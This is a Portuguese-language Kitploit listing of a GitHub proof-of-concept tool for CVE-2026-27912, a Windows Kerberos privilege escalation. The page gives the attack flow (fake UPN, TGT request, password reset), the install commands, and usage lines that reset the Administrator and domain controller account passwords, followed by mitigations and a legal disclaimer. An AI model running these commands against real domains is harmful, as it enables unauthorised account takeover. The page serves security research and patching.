Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Kerberos-CVE-2026-27912 — PoC para CVE-2026-27912 - Elevação de Privilégio do Kerberos do Windows (ResetNightmare). Redefinição de senha não autorizada por meio de falha do Kerberos. Apenas para pesquisa de segurança. | Kitploit
Ferramentas/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
Autenticação e AutorizaçãoEscalada de PrivilégiosAtaques de SenhaExploraçãoTestes de Penetração
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC para CVE-2026-27912 - Elevação de Privilégio do Kerberos do Windows (ResetNightmare). Redefinição de senha não autorizada por meio de falha do Kerberos. Apenas para pesquisa de segurança.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 5 diasAinda não revisado

Kerberos-CVE-2026-27912

CVE-2026-27912 - Vulnerabilidade de Elevação de Privilégio no Windows Kerberos

ResetNightmare - Redefinição de senha não autorizada por meio de falha no protocolo de alteração de senha do Kerberos.


📋 Detalhes

CampoValor
CVECVE-2026-27912
TítuloVulnerabilidade de Elevação de Privilégio no Windows Kerberos
CVSS8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: Improper Authorization
Publicado14 de abril de 2026
CorrigidoAbril de 2026

🔍 Fluxo de Ataque

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 Requisitos

  • Windows com PowerShell
  • Módulo ActiveDirectory (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (baixe de GhostPack/Rubeus)
  • Acesso à rede para o controlador de domínio

🚀 Instalação

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 Uso

Ataque Básico

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

Conta de Computador Alvo

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

Criar Nova Conta

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

Modo Detalhado

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 Argumentos


🛡️ Mitigação

  1. Aplique o patch oficial da Atualização de Segurança da Microsoft
  2. Segmente a rede para limitar o acesso à rede adjacente
  3. Aplique o princípio do menor privilégio - restrinja permissões de escrita de UPN
  4. Monitore alterações suspeitas de UPN e redefinições de senha

⚠️ Aviso Legal

Somente para testes de segurança autorizados e pesquisa educacional.

O acesso não autorizado a sistemas de computador é ilegal. O autor não assume nenhuma responsabilidade pelo uso indevido deste software.


📚 Referências

  • NVD: CVE-2026-27912
  • Guia de Atualizações de Segurança da Microsoft

👨‍💻 Autor

n0vax1337 / Pesquisador de Segurança


📄 Licença

Licença MIT - veja LICENSE


Última atualização: 2026

Baixar ferramenta
FlagDescriçãoPadrão
-t / --targetNome da conta alvoobrigatório
-p / --new-passwordNova senha para o alvoobrigatório
-u / --upn-userConta para definir UPN falsoobrigatório
-up / --upn-passwordSenha da conta UPNobrigatório
-c / --computerUPNUser é uma conta de computadorflag
-r / --rubeus-pathCaminho para Rubeus.exeRubeus.exe
-e / --encryptionTipo de criptografia suportadoAES256
-path / --create-pathCaminho OU para criar nova conta""
-d / --dcNome do controlador de domíniodetecção automática
-v / --verboseSaída detalhadaflag